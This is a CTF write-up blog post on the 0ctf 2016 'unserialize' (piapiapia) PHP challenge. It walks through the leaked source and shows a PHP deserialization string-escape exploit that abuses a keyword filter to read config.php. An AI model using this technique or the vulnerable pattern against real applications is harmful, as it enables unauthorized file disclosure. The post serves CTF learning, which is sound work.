0ctf_2016 _Web_unserialize

最新推荐文章于 2023-06-01 15:03:00 发布
最新推荐文章于 2023-06-01 15:03:00 发布
阅读量354 收藏 1
点赞数 1
分类专栏: nssctf 文章标签: 前端 php java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126833337
版权

解题:

进入环境 扫目录。 得到 www.zip ,下载得到 好几个 源码

class.php   config.php   index.php    profile.php  register.php   update.php

index页面源码:

<?php
	require_once('class.php');
	if($_SESSION['username']) {
		header('Location: profile.php');
		exit;
	}
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');

		if($user->login($username, $password)) {
			$_SESSION['username'] = $username;
			header('Location: profile.php');
			exit;	
		}
		else {
			die('Invalid user name or password');
		}
	}
	else {

简单看了下,没有什么问题,只是做了长度的限制,登录进去会跳转到profile.php

注册页面源码:

<?php
	require_once('class.php');
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
		if(!$user->is_exists($username)) {
			$user->register($username, $password);
			echo 'Register OK!<a href="index.php">Please Login</a>';		
		}
		else {
			die('User name Already Exists');
		}
	}
	else {
?>

也没有什么问题,同样是 检测长度,并且 确定username 存不存在。

update.php 

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>

对填写的字符 进行了正则。

profile.php 

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>

看到前面的代码。 满足了登录,且profile信息存在,则后面有个else 。 可能这就是最终利用到的代码:

$photo = base64_encode(file_get_contents($profile['photo']));

可能也就是说,我们要修改 profile 中的 photo 来读取flag。

知道了这些,我们再看看剩下的两个代码:

class.php

<?php
require('config.php');

class user extends mysql{
	private $table = 'users';

	public function is_exists($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
	public function show_profile($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
	public function __tostring() {
		return __class__;
	}
}

class mysql {
	private $link = null;

	public function connect($config) {
		$this->link = mysql_connect(
			$config['hostname'],
			$config['username'], 
			$config['password']
		);
		mysql_select_db($config['database']);
		mysql_query("SET sql_mode='strict_all_tables'");

		return $this->link;
	}

	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}

	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}

	public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}
}
session_start();
$user = new user();
$user->connect($config);

class一般都是重要函数函数调用和数据库查询需要用到的文件。 class中包含了 config。php 去看看config .php 

config.php:

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

看到这里有个flag  应该是要class调用 config.php进行读取了。

经过前面的思路就是 ,注册,登录,然后update 更新自己的信息,传给了 profile 。而photo参数具有文件读取的功能。

update.php中。

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {

这里调用了 个 update_profile 跟进一下。

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

直接修改对象中的profile 信息,这里还调用了filter 过滤,跟进一下 filter 函数。

	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
return preg_replace($safe, 'hacker', $string);

如果我们输入 'select', 'insert', 'update', 'delete', 'where' 这些字符,他就会自动替换为 hacker。

不由想到 字符串逃串。

 

 

 果然把 我们的photo 替换成了hacker

exp

<?php

class b
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array("wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere");
	public $photo = "config.php";
}
$a=new b();
$profile = serialize($a);
echo $profile;

?>
//O:1:"b":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:170:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

抓包

返回页面后点击Your Profile

查看源代码:

 解密就是flag

 

snowlyzz
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[0CTF-2016] piapiapia
Logerrik的博客
05-11 424
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
0ctf_2016_warmup
05-17
20160ctf的pwn题。
0ctf_2016_unserialize
qq_53460654的博客
10-20 2896
打开环境 只有个登录框 应该存在源码泄露,直接试试访问www.zip 得到源码 直接自动代码审计 发现有疑似这些漏洞 但是没有找到我们的反序列化,因为题目就是反序列化 然后自己来审计一下 在profile.php中 $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email']; $nickname = $profile['nickname']; $photo = base64_encode
BMZCTF:0ctf_2016_unserialize
末初的CSDN博客
02-04 703
http://bmzclub.cn/challenges#0ctf_2016_unserialize 网站根目录下www.zip有源码,看一些关键代码 update.php <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } if($_POST['phone'] && $_POST['email'] && $_POST['
ctf之php序列化,0ctf_2016_unserialize(php反序列化逃逸字符)
weixin_39769228的博客
04-01 1039
一.0ctf_2016_unserialize(php反序列化逃逸字符)1234知识点:* 代码审计* Unserialize* LFR通过源码,我们可以发现在config.php中的flag,这题意图已经很明显了,是要我们读取config.php文件的内容。1234567...
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
0CTF-2016-Web-piapiapia
feng的博客
11-07 273
知识点 备份文件下载 PHP代码审计 数组绕过preg_match 反序列化字符逃逸 WP 首先进入环境,查看源代码,发现了备份文件: 然后下载下来,进行代码审计。审计完之后可以知道,flag是在config.php文件里,但是我们没法直接读取。唯一可以读取文件的就是profile.php里的这个: else { $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email'];
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2484
[CTFTraining] 0CTF 2016 Unserialize
[青少年CTF]Web_unserialize
明裕学长的博客
03-16 284
将此base64解密得出flag。这道题一开始需要扫目录发现。
攻防世界web进阶_Web_php_unserialize
shayebudon的博客
12-11 2095
查看代码 首先定义了一个Demo类, 有一个注释,提醒我们flag在fl4g.PHP中, Demo中的_destruct如果Demo类被销毁,那么就会高亮显示file所指向的文件的内容 _wakeup当进行反序列化时 自动执行所以要绕过_wakeup 变量var的传入 首先进行base64加密 然后preg_match匹配函数 如果匹配上 就“stop hacking” 否则unserialize($var) preg_match('/[oc]:\d+:/i', $v...
[0CTF 2016]piapiapia
qq_45691294的博客
10-08 365
打开题目,看到一个可爱的登录界面,尝试SQL注入未果,直接目录扫描 扫描到register.php config.php 和备份文件www.zip 先弄清楚这些页面的具体功能,在register.php注册账号然后登录,看到一个填写个人资料的表单,也存在文件上传点 尝试后,应该不存在SQL注入和文件上传漏洞,填写信息后提交,然后在profile.php可以查看到我们提交的资料 到这里,我们已经对大致的功能点有所了解,不过漏洞点还不确定,因此要审计泄露的备份文件 首先看下刚才发现的功能点和猜测的漏洞点的源码
攻防世界: WEB——unserialize3
Zeker62的博客
08-23 270
靶场内容 题目:反序列化——说明和反序列化有关 打开靶场:PHP代码——PHP反序列化 solution 这个靶场出来之后,显示出来是一个不完整的PHP代码——括号都没有完全闭合 开始分析: __wakeup()属于魔术方法,通常用于反序列化中。 unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对...
XCTF1-web unserialize
orchid_sea的博客
11-28 623
绕过wakeup()函数:wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过。
XCTF-高手进阶区:Web_php_unserialize(详解)
1stPeak's Blog
02-29 3935
代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
攻防世界之Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3195
攻防世界WP
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值